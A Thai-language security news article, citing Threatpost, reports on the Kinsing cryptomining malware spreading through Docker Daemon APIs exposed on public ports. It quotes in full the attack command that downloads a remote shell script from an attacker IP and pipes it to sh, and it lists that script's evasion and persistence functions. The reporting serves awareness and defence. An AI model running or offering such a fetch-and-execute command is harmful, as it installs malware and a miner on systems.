พบ “Kinsing” มัลแวร์สายขุดเหมืองบนDocker มีอัตราการแพร่กระจาย 1,000 พอร์ต/วัน

ขณะนี้ผู้ให้บริการคลาวด์คอนเทนเนอร์อย่าง Docker กำลังประสบปัญหาจาก “Kinsing” มัลแวร์แบบแพร่กระจายตัวเองที่อาศัยช่องโหว่จากการตั้งค่า Docker Daemon API ที่มีการเปิดพอร์ตสาธารณะไว้ โดยมีเป้าหมายในการโจมตีสูงถึง 1,000 คอนเทนเนอร์ต่อวัน

รูปแบบการโจมตีเริ่มจากการที่ผู้โจมตีค้นหา Docker API ที่มีการเปิดพอร์ตสาธารณะไว้ แล้วทำการเชื่อมต่อเข้ากับพอร์ตดังกล่าว ก่อนที่จะทำการรัน Rogue Ubuntu container เพื่อเรียกใช้ “Kinsing” ให้ไปดาวน์โหลดคริปโตไมเนอร์มารันบนเครื่องเป้าหมาย จากนั้นจะทำการแพร่กระจายตัวเองไปยังคอนเทนเนอร์และโฮสต์อื่นๆ ต่อไป

คำสั่งที่มักจะพบในการโจมตีคือ “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh | sh;tail -f /dev/null.” เพื่ออัพเดท Docker package ทำให้ผู้โจมตีจะสามารถดาวโหลดเชลล์สคริปต์ที่ชื่อ d.sh ได้

จากการวิเคราะห์เชลล์สคริปต์ดังกล่าวโดยคุณ Gal  Singer นักวิจัยด้านความปลอดภัยจาก AquaSec. พบว่ามันมีความสามารถหลายอย่าง เช่น ปิดการใช้งานระบบรักษาความปลอดภัย ลบLogs กำจัดมัลแวร์หรือคริปโตไมเนอร์ตัวอื่นๆ ดาวน์โหลดKinsing และใช้ “crontab” เพื่อรันสคริปต์ต้นฉบับในทุกๆ 1 นาที

ที่มา: https://threatpost.com/self-propagating-malware-docker-ports/154453/

Share

Add Your Comments

Your email address will not be published. Required fields are marked *